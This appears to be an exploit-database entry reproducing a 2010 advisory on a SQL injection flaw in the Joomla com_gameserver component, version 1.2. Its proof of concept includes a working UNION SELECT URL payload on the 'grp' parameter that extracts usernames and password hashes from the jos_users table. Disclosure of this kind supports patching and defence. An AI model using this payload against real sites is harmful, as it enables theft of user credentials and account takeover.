Joomla (com_gameserver) SQL Injection Vulnerability

vendor:

Joomla

by:

B-Hunt3|2

5,5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Joomla

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Demo Site

2010

Joomla (com_gameserver) SQL Injection Vulnerability

Input var "grp" is vulnerable to SQL code injection. AFFECTED VERSIONS: Confirmed in 1.2 but probably other versions also. RISK: High/Medium IMPACT: Execute Arbitrary SQL queries

Mitigation:

Input validation and sanitization of user input

Source

Exploit-DB raw data:

# Exploit Title: Joomla (com_gameserver) SQL Injection Vulnerability
# Date: 2010-01-22
# Author: B-Hunt3|2
# Software Link: http://joomlacode.org/gf/project/gameserver/frs/
# Version: 1.2
# CVE : N/A

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (com_gameserver) SQL Injection Vulnerability 
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: Demo Site

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var "grp" is vulnerable to SQL code injection.
[~]>> AFFECTED VERSIONS: Confirmed in 1.2 but probably other versions also. 
[~]>> RISK: High/Medium
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> http://server/component/gameserver/?view=gameserver&grp=[SQL]
[~]>> http://server/component/gameserver/?view=gameserver&grp=-1'+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%23

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...